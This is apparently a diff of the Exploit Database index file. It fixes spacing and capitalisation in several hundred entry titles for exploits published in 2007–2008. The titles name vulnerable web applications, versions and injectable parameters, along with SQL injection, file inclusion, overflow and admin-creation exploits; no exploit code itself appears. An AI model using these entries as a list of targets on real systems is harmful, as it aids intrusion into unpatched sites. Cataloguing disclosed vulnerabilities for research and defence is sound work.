4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - (CryptoX.dll 2.0) SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - (CryptoX.dll 2.0) Remote Buffer Overflow Exploit",2007-09-10,shinnai,windows,remote,0 @@ -4055,7 +4056,7 @@ id,file,description,date,author,platform,type,port 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) SQL Injection",2007-09-14,s4mi,php,webapps,0 4409,platforms/windows/dos/4409.html,"HP ActiveX - (hpqutil.dll ListFiles hpqutil.dll) Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 -4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post'SQL Injection",2007-09-14,s0cratex,php,webapps,0 +4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module - SQL Injection",2007-09-15,s4mi,php,webapps,0 @@ -4068,7 +4069,7 @@ id,file,description,date,author,platform,type,port 4420,platforms/windows/remote/4420.html,"MW6 Technologies QRCode ActiveX 3.0 - Remote File Overwrite",2007-09-18,shinnai,windows,remote,0 4421,platforms/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,php,webapps,0 4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module - SQL Injection",2007-09-18,Houssamix,php,webapps,0 -4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html'Remote File Inclusion",2007-09-18,mozi,php,webapps,0 +4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0 4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 @@ -4079,7 +4080,7 @@ id,file,description,date,author,platform,type,port 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution Exploit",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 -4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - (phpbb_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 +4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - (phpBB_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 @@ -4089,7 +4090,7 @@ id,file,description,date,author,platform,type,port 4441,platforms/php/webapps/4441.txt,"izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 -4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class'SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 +4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object - (emprint.dll 6.0.1.0) Buffer Overflow Exploit",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 @@ -4116,7 +4117,7 @@ id,file,description,date,author,platform,type,port 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 -4471,platforms/php/webapps/4471.txt,"PHPBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 +4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 4472,platforms/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,php,webapps,0 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - (base.php) Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4474,platforms/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - FtpDownloadFile() Remote Buffer Overflow",2007-10-01,shinnai,windows,dos,0 @@ -4143,7 +4144,7 @@ id,file,description,date,author,platform,type,port 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0 4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 -4498,platforms/windows/dos/4498.pl,"wzdftpd 0.8.0 - (USER) Remote Denial of Service",2007-10-07,k1tk4t,windows,dos,0 +4498,platforms/windows/dos/4498.pl,"WzdFTPD 0.8.0 - (USER) Remote Denial of Service",2007-10-07,k1tk4t,windows,dos,0 4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 @@ -4160,8 +4161,8 @@ id,file,description,date,author,platform,type,port 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow Exploit",2007-10-10,bangus/magnum,linux,remote,0 -4515,platforms/solaris/local/4515.c,"Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 -4516,platforms/solaris/local/4516.c,"Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)",2007-10-10,qaaz,solaris,local,0 +4515,platforms/solaris/local/4515.c,"Solaris 10 (sparc/x86) - sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 +4516,platforms/solaris/local/4516.c,"Solaris (sparc/x86) - fifofs I_PEEK Kernel Memory Disclosure Exploit",2007-10-10,qaaz,solaris,local,0 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 @@ -4363,7 +4364,7 @@ id,file,description,date,author,platform,type,port 4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 -4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template'Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 +4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"Wordpress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 @@ -4383,7 +4384,7 @@ id,file,description,date,author,platform,type,port 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 -4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group'SQL Injection",2007-12-18,k1tk4t,php,webapps,0 +4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 @@ -4472,11 +4473,11 @@ id,file,description,date,author,platform,type,port 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0 -4830,platforms/php/webapps/4830.txt,"ClipShare - 'uprofile.php UID'SQL Injection",2008-01-02,Krit,php,webapps,0 +4830,platforms/php/webapps/4830.txt,"ClipShare - 'uprofile.php UID' SQL Injection",2008-01-02,Krit,php,webapps,0 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote / Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 -4834,platforms/php/webapps/4834.txt,"samPHPweb - 'db.php commonpath'Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 +4834,platforms/php/webapps/4834.txt,"samPHPweb - 'db.php commonpath' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0 4836,platforms/php/webapps/4836.txt,"samPHPweb - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 @@ -4551,7 +4552,7 @@ id,file,description,date,author,platform,type,port 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 -4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'showproduct.asp cat'SQL Injection",2008-01-14,JosS,asp,webapps,0 +4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'showproduct.asp cat' SQL Injection",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Authentication Bypass",2008-01-15,ka0x,php,webapps,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet - isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 @@ -4579,7 +4580,7 @@ id,file,description,date,author,platform,type,port 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 -4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr'File Handling Buffer Overflow Exploit",2008-01-18,shinnai,windows,local,0 +4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Exploit",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"Wordpress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 @@ -4638,7 +4639,7 @@ id,file,description,date,author,platform,type,port 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 -4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx'Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 +4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 @@ -4880,7 +4881,7 @@ id,file,description,date,author,platform,type,port 5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0 5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 -5243,platforms/php/webapps/5243.txt,"Fully Modded PHPBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 +5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 5246,platforms/php/webapps/5246.txt,"easycalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 @@ -4910,7 +4911,7 @@ id,file,description,date,author,platform,type,port 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp - 'links.asp CatId'SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 @@ -4937,7 +4938,7 @@ id,file,description,date,author,platform,type,port 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps,0 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 -5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t'Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 +5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 5306,platforms/multiple/dos/5306.txt,"snircd 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 @@ -5005,7 +5006,7 @@ id,file,description,date,author,platform,type,port 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0 5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum'SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0 5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0 @@ -5015,10 +5016,10 @@ id,file,description,date,author,platform,type,port 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Remote File Upload",2008-04-06,JIKO,php,webapps,0 -5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie'SQL Injection",2008-04-06,parad0x,php,webapps,0 +5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0 5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0 -5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum'SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 +5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0 @@ -5055,10 +5056,10 @@ id,file,description,date,author,platform,type,port 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0 -5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language'Local File Inclusion",2008-04-10,dun,php,webapps,0 +5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0 5424,platforms/linux/local/5424.txt,"Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 -5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID'SQL Injection",2008-04-10,S@BUN,php,webapps,0 +5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 @@ -5103,7 +5104,7 @@ id,file,description,date,author,platform,type,port 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - (contact.php id) SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0 5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - (AMG_id) SQL Injection",2008-04-19,Player,php,webapps,0 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0 -5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php r'SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 +5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php r' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - 'detail.php id' SQL Injection",2008-04-19,S@BUN,php,webapps,0 5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0 @@ -5140,7 +5141,7 @@ id,file,description,date,author,platform,type,port 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 -5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie'SQL Injection",2008-04-27,ProgenTR,php,webapps,0 +5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie' SQL Injection",2008-04-27,ProgenTR,php,webapps,0 5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php sid' SQL Injection",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 5511,platforms/windows/remote/5511.html,"HP Software Update - (Hpufunction.dll 4.0.0.1) Insecure Method (PoC)",2008-04-27,callAX,windows,remote,0 @@ -5175,7 +5176,7 @@ id,file,description,date,author,platform,type,port 5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - (ParentId) SQL Injection",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' SQL Injection",2008-05-05,K-159,php,webapps,0 -5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'viewfaqs.php cat'SQL Injection",2008-05-05,K-159,php,webapps,0 +5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'viewfaqs.php cat' SQL Injection",2008-05-05,K-159,php,webapps,0 5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - SQL Injection",2008-05-05,K-159,php,webapps,0 @@ -5185,10 +5186,10 @@ id,file,description,date,author,platform,type,port 5550,platforms/php/webapps/5550.php,"deluxebb 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 -5553,platforms/asp/webapps/5553.txt,"fipsCMS - 'print.asp lg'SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5553,platforms/asp/webapps/5553.txt,"fipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0 5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 